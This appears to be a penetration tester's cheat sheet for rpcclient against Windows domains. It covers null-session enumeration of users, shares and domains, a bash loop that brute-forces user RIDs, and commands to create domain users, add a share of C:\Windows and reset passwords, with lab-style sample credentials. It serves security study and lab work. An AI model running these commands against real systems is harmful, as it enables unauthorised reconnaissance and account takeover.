### Commands ```bash rpcclient -U "" -N <IP> ``` ### Query | **Query** | **Description** | | ------------------------- | ------------------------------------------------------------------ | | `srvinfo` | Server information. | | `enumdomains` | Enumerate all domains that are deployed in the network. | | `querydominfo` | Provides domain, server, and user information of deployed domains. | | `netshareenumall` | Enumerates all available shares. | | `netsharegetinfo <share>` | Provides information about a specific share. | | `enumdomusers` | Enumerates all domain users. | | `queryuser <RID>` | Provides information about a specific user. | | `lookupnames $username` | | | `getdompwinfo` | | | `getusrdompwinfo 1000` | | ### User Enumeration & Group Info ```bash rpcclient gt; enumdomusers user:[wook] rid:[0x3e8] rpcclient gt; queryuser 0x3e8 rpcclient gt; querygroup 0x201 ``` ### Brute Forcing User RIDs ```bash for i in $(seq 500 1100);do rpcclient -N -U "" <IP> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done ``` ### Brute Forcing User RIDs with [[samrdump.py]] ```bash samrdump.py <IP> ``` ### Create a new user ```bash rpcclient gt; createdomuser $username rpcclient gt; setuserinfo2 $username 24 '$newpassword' ``` ### Create a new share ```bash rpcclient gt; netshareadd "C:\Windows" "Windows" 10 "Windows Share" ``` ### Change a user password ```bash #1) rpcclient gt; chgpasswd3 $username $oldpass $newpass #2) rpcclient //$IP -U domain/user%pwd setuserinfo2 <user> <level> <pwd> setuserinfo2 MOLLY.SMITH 23 'Password123!' # net rpc password to reset password for user net rpc password ewalters "Hacksmarter123!" -U "RSmith%IhateEric2" -S lab.trusted ```